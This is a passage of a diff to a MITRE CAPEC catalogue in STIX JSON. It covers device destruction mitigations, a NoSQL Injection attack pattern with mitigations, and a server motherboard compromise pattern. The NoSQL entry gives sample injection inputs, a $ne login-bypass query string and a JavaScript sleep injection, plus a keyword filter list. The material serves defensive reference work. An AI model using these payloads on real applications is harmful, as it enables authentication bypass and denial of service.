"2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Physically destroy the device if it is not intended to be reused. Using a specialized service to disintegrate, burn, melt or pulverize the device can be effective, but if those services are inaccessible, drilling nails or holes, or smashing the device with a hammer can be effective. Do not burn, microwave, or pour acid on a hard drive.", + "id": "course-of-action--6188a1a5-51e6-4194-aac9-6a2460c9cbdb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--55cb9df9-3d72-443f-b1ce-78c51b0bba4e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6188a1a5-51e6-4194-aac9-6a2460c9cbdb", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Physically destroy memory and SIM cards for mobile devices not intended to be reused.", + "id": "course-of-action--388e0698-f2f5-4a1e-9c92-8446aeb9bf7a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--74fd4f17-afa6-4329-9ea8-ddc1e2e6d43b", + "modified": 
"2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--388e0698-f2f5-4a1e-9c92-8446aeb9bf7a", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the user account has been terminated or switched to a new device before destroying.", + "id": "course-of-action--c28595a5-c39f-414b-9c5d-1907e7202d7d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb3df538-c4c4-4672-aef8-3908c2fce1fc", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c28595a5-c39f-414b-9c5d-1907e7202d7d", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary targets software that constructs NoSQL statements based on user input or with parameters vulnerable to operator replacement in order to achieve a variety of technical impacts such as escalating privileges, bypassing authentication, and/or executing code.\n ", + "external_references": [ + { + "external_id": "CAPEC-676", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/676.html" + }, + { + 
"external_id": "CWE-943", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/943.html" + }, + { + "external_id": "CWE-1286", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1286.html" + }, + { + "description": "Testing for NoSQL Injection, The OWASP Foundation", + "external_id": "REF-668", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection" + }, + { + "description": "Charlie Belmer, NoSql Injection Cheatsheet, 2021--06---07, Null Sweep", + "external_id": "REF-669", + "source_name": "reference_from_CAPEC", + "url": "https://nullsweep.com/nosql-injection-cheatsheet/" + }, + { + "description": "Patrick Spiegel, NoSql Injection: Fun with Objects and Arrays, The OWASP Foundation", + "external_id": "REF-670", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf" + }, + { + "description": "NoSql Injection: Fun with Objects and ArraysNoSQL Injection Attacks and Prevention Techniques, 2019--06, WebOrion", + "external_id": "REF-671", + "source_name": "reference_from_CAPEC", + "url": "https://www.theweborion.com/wp-content/uploads/2019/06/NoSQL-Injection-Attacks-and-Prevention-Techniques.pdf" + } + ], + "id": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "NoSQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute 
Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The following examples primarily cite MongoDB, PHP, and NodeJS attacks due to their prominence and popularity. However, please note that these attacks are not exclusive to this NoSQL instance, programming language, or runtime framework.\n Within NodeJS, Login Bypass attacks are possible via MongoDB if user-input is not properly validated and sanitized [REF-670].\n //NodeJS with Express.jsdb.collection('users').find({\"user\": req.query.user,\"password\": req.query.password});\n \n \n The above code works fine if the user were to submit a query like the following:\n https://example.org/login?user=patrick&password=1234\n \n But an adversary could submit a malicious query such as the below, which would be interpreted by the code as follows:\n https://example.org/login?user=patrick&password[$ne]=\n //NodeJS with Express.jsdb.collection('users').find({\"user\": bob,\"password\": {\"&ne\": \"\"}});\n \n This will result in a Login Bypass attack, as the query will succeed for all values where Bob's password is not an empty string.\n ", + "\n MongoDB instances are also vulnerable to JavaScript Injection Attacks when user input is not properly validated and sanitized.\n //PHP with MongoDBdb.collection.find({$where: function() {return (this.username == $username) } } );\n \n \n \n If the user properly specifies a username, then this code will execute as intended. 
However, an adversary can inject JavaScript into the \"$username\" variable to achieve a NoSQL Injection attack as follows:\n //PHP with MongoDBdb.collection.find({$where: function() {return (this.username == 'foo'; sleep(5000) ) } } );\n \n \n This will result in the server sleeping for 5 seconds if the attack was successful. An adversary could supply a larger value to deny service to the application.\n ", + "\n If leveraging PHP with MongoDB, operator replacement attacks are possible if special query operators are not properly addressed. The below example from OWASP's \"Test for NoSQL Injection\" displays a simple case of how this could occur.[REF-668]\n db.myCollection.find({$where: function() {return obj.credits - obj.debits < 0; } } );\n \n \n Even though the above query does not depend on any user input, it is vulnerable to a NoSQL injection attack via operator replacement on the \"$where\" keyword. In this case, the adversary could exploit MongoDB in the following manner:\n $where: function() { //arbitrary JavaScript here }\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application: Due to the number of NoSQL databases available and the numerous language/API combinations of each, the adversary must first survey the target application to learn what technologies are being leveraged and how they interact with user-driven data.

  2. Techniques
    Determine the technology stack leveraged by the target application, such as the application server, drivers, frameworks, APIs, and databases being utilized.
    Identify areas of the application that interact with user input and may be involved with NoSQL queries.

Experiment

  1. Identify user-controllable input susceptible to injection: After identifying the technology stack being used and where user-driven input is leveraged, determine the user-controllable input susceptible to injection such as authentication or search forms. For each user-controllable input that the adversary suspects is vulnerable to NoSQL injection, attempt to inject characters or keywords that have special meaning in the given NoSQL database or language (e.g., \"$ne\" for MongoDB or \"$exists\" for PHP/MongoDB), or JavaScript that can be executed within the application. The goal is to create a NoSQL query with an invalid syntax.

  2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.
  3. Experiment with NoSQL Injection vulnerabilities: After determining that a given input is vulnerable to NoSQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, modify/delete information in the database, or execute commands on the server.

  4. Techniques
    Use public resources such as OWASP's \"Testing for NoSQL Injection\" [REF-668] or Null Sweep's \"NoSQL Injection Cheatsheet\" [REF-669] and try different approaches for adding logic to NoSQL queries.
    Iteratively add logic to the NoSQL query and use detailed error messages from the server to debug the query.
    Attempt an HTTP Parameter Pollution attack to replace language-specific keywords, such as \"where\" within PHP [CAPEC-460].

Exploit

  1. Exploit NoSQL Injection vulnerability: After refining and adding various logic to NoSQL queries, craft and execute the underlying NoSQL query that will be used to attack the target system.

  2. Techniques
    Craft and Execute underlying NoSQL query
", + "x_capec_extended_description": "\n NoSQL database calls are written in an application's programming language, via a custom API call, or formatted in a common convention (e.g., JSON, XML, etc.), any of which the adversary can exploit to achieve the aforementioned goals. NoSQL attacks usually result from improper sanitization and validation of data that originates from a user, either via special character or JavaScript injection. In both cases, the adversary crafts input strings so that when the target software constructs NoSQL statements based on the input, the resulting NoSQL statement performs actions other than those intended by the application. However, unlike traditional SQL Injection attacks, NoSQL injection attacks can also occur in instances where the application does not rely upon user input, as is the case in operator replacements. This entails the adversary overriding reserved NoSQL variable names with ones that have been modified with malicious functionality (e.g., $where in MongoDB). In all cases, depending on the NoSQL API and data model used, successful injection can cause information disclosure, data modification, and code execution at the application level.\n Note: NoSQL Injection attacks are executed within a procedural language (e.g., C, C++, Perl), as opposed to the declarative SQL language itself. As a result, NoSQL injection attacks can potentially result in greater impacts than traditional SQL Injection attacks [REF-668].\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Awareness of the technology stack being leveraged by the target application.", + "NoSQL queries used by the application to store, retrieve, or modify data.", + "User-controllable input that is not properly validated by the application as part of NoSQL queries.", + "Target potentially susceptible to operator replacement attacks." 
+ ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "For keyword and JavaScript injection attacks, it is fairly simple for someone with basic NoSQL knowledge to perform NoSQL injection, once the target's technology stack has been determined.", + "Medium": "For operator replacement attacks, the adversary must also have knowledge of HTTP Parameter Pollution attacks and how to conduct them." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as relevant NoSQL and JavaScript content. NoSQL-specific keywords, such as $ne, $eq or $gt for MongoDB, must be filtered in addition to characters such as a single-quote(') or semicolons (;) based on the context in which they appear. 
Validation should also extend to expected types.", + "id": "course-of-action--c3e9e3ff-9ab8-46b9-8bd2-7d63b43a2ef4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--869ea0bd-ba58-497e-ba60-bb6b4e05a203", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c3e9e3ff-9ab8-46b9-8bd2-7d63b43a2ef4", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, leverage safe APIs (e.g., PyMongo and Flask-PyMongo for Python and MongoDB) for queries as opposed to building queries from strings.", + "id": "course-of-action--c36658ef-ec56-451f-9d0f-cc4e8364709e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d13883d0-b82e-40df-b760-850af2e151e9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c36658ef-ec56-451f-9d0f-cc4e8364709e", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": 
"3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the most recent version of a NoSQL database and it's corresponding API are used by the application.", + "id": "course-of-action--f535cf43-16c4-4702-82b4-f2ad54457382", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba86a192-07aa-4b27-be1a-28cd2e920662", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f535cf43-16c4-4702-82b4-f2ad54457382", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of custom error pages - Adversaries can glean information about the nature of queries from descriptive error messages. 
Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.", + "id": "course-of-action--4c849df7-9814-41f1-b257-5be9d1636087", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1126520b-05be-455e-9d4d-a4bcf7ce2218", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c849df7-9814-41f1-b257-5be9d1636087", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Exercise the principle of Least Privilege with regards to application accounts to minimize damage if a NoSQL injection attack is successful.", + "id": "course-of-action--7f433708-ce26-4500-81a0-5a94a7fe8032", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec6f7349-8700-4bcc-a21a-24391221b7c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7f433708-ce26-4500-81a0-5a94a7fe8032", + "target_ref": 
"attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using MongoDB, disable server-side JavaScript execution and leverage a sanitization module such as \"mongo-sanitize\".", + "id": "course-of-action--3aa6e395-8929-42e8-96db-20d559ee7c77", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5101e2fb-b215-4be6-857a-0e5c8aa7341c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3aa6e395-8929-42e8-96db-20d559ee7c77", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using PHP with MongoDB, ensure all special query operators (starting with $) use single quotes to prevent operator replacement attacks.", + "id": "course-of-action--3753e389-6551-4beb-a945-aa3c36831232", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce0040af-39bd-44c9-b2a6-d529ca6a642d", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3753e389-6551-4beb-a945-aa3c36831232", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Additional mitigations will depend on the NoSQL database, API, and programming language leveraged by the application.", + "id": "course-of-action--514cd9bd-12f1-4cf8-9093-4f575517aa3b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3626f089-3a82-4044-85fc-50f2f7def667", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--514cd9bd-12f1-4cf8-9093-4f575517aa3b", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Malware is inserted in a server motherboard (e.g., in the flash memory) in order to alter server functionality from that intended. 
The development environment or hardware/software support activity environment is susceptible to an adversary inserting malicious software into hardware components during development or update.\n ", + "external_references": [ + { + "external_id": "CAPEC-677", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/677.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": " Kaspersky Finds Sophisticated UEFI Malware in the Wild , 2020--10---05, ExtremeTech ", + "external_id": "REF-685", + "source_name": "reference_from_CAPEC", + "url": " https://www.extremetech.com/computing/315860-kaspersky-finds-sophisticated-uefi-malware-in-the-wild" + } + ], + "id": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Server Motherboard Compromise", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized 
Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Malware is inserted into the Unified Extensible Firmware Interface (UEFI) software that resides on a flash memory chip soldered to a computer’s motherboard. It is the first thing to turn on when a system is booted and is allowed access to almost every part of the operating system. Hence, the malware will have extensive control over operating system functions and persist after system reboots. [REF-685]\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary with access to hardware/software processes and tools within the development or hardware/software support environment can insert malicious software into hardware components during development or update/maintenance." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase IT systems, components and parts from government approved vendors whenever possible.", + "id": "course-of-action--c1be3529-9fb7-40a8-a6eb-097c4e1a3933", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cec1097b-0d23-4a54-9ae9-64654e393f3d", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c1be3529-9fb7-40a8-a6eb-097c4e1a3933", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Establish diversity among suppliers.", + "id": "course-of-action--9dd6990e-28bb-4e3f-9efd-11084ccef57d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--864c9da9-4c92-4cea-9641-e0a25d17486e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9dd6990e-28bb-4e3f-9efd-11084ccef57d", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct rigorous threat assessments of suppliers.", + "id": "course-of-action--a3848e81-2458-40d9-b92b-21aed1a69465", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--956e89e4-8b30-4e89-aed9-b592c0de779b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a3848e81-2458-40d9-b92b-21aed1a69465", + "target_ref": 
"attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require that Bills of Material (BoM) for critical parts and components be certified.", + "id": "course-of-action--19824486-f485-41ff-bdbf-70e7555d7a3b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4da5652f-279d-465c-876f-f61e2bd78e19", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--19824486-f485-41ff-bdbf-70e7555d7a3b", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize contract language requiring contractors and subcontractors to flow down to subcontractors and suppliers SCRM and SCRA (Supply Chain Risk Assessment) requirements.", + "id": "course-of-action--9e2b4607-57c1-423b-8b87-1ca72b6669b9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d6678ab4-13ee-4393-9302-f1f849c12afd", + "modified": "2023-01-24T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9e2b4607-57c1-423b-8b87-1ca72b6669b9", + "target_ref": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Establish trusted supplier networks.", + "id": "course-of-action--d8534e9f-4499-45e3-9ae1-85cf37f54f1c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9b49a971-d419-4828-b65f-13ac15c90fd6", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 